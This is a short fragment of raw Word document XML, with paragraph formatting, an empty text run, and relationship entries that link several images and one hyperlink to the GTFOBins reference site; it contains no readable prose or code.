        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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3.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.org/"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19.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId12"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8.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6.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